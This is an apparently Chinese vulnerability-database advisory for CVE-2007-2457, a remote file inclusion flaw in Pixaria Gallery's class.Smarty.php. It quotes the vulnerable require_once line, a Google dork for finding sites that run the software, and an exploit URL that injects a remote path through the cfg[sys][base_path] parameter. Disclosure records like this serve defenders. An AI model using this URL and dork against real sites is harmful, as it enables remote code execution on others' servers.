Pixaria Gallery 'Class.Smarty.PHP' 远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112713 漏洞类型 代码注入
发布时间 2007-04-14 更新时间 2007-05-04
CVE编号 CVE-2007-2457 CNNVD-ID CNNVD-200705-048
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/3733
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-048
|漏洞详情
PixariaGallery的resources/includes/class.Smarty.php中存在PHP远程文件包含漏洞。远程攻击者可以借助cfg[sys][base_path]参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
Pixaria Gallery 1.x (class.Smarty.php) Remote File Include Vulnerability

-----------------------------------------------------------------------------------------
# scripts            : Pixaria Gallery 1.x
# Discovered By : irvian
# scripts site      : http://pixaria.com/
# Thanks To       : #hitamputih  #nyubicrew  #patihack
# special To       : nyubi,ibnusina,arioo,jipank,kacung,trangkil,cah_gemblunkz
# dork                : powered by Pixaria. Gallery
------------------------------------------------------------------------------------------
bug found:

/resources/includes/class.Smarty.php
// Load the main Smarty class
require_once ($cfg['sys']['base_path'] . "resources/smarty/libs/Smarty.class.php");


Exploit: http://www.target.com/resources/includes/class.Smarty.php?cfg[sys][base_path]=[evilcode] 

# milw0rm.com [2007-04-14]
|参考资料

来源:BID
名称:23489
链接:http://www.securityfocus.com/bid/23489
来源:www.pixaria.com
链接:http://www.pixaria.com/news/article/71/
来源:XF
名称:pixaria-classsmarty-file-include(33662)
链接:http://xforce.iss.net/xforce/xfdb/33662
来源:www.pixaria.com
链接:http://www.pixaria.com/news/article/70/
来源:MILW0RM
名称:3733
链接:http://www.milw0rm.com/exploits/3733
来源:VUPEN
名称:ADV-2007-1390
链接:http://www.frsirt.com/english/advisories/2007/1390
来源:SECUNIA
名称:24821
链接:http://secunia.com/advisories/24821
来源:pixaria.com
链接:http://pixaria.com/index.history.php
来源:OSVDB
名称:34976
链接:http://osvdb.org/34976
来源:BUGTRAQ
名称:20070414PixariaGallery1.0(class.Smarty.php)RemoteFileIncludeVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/465847/100/200/threaded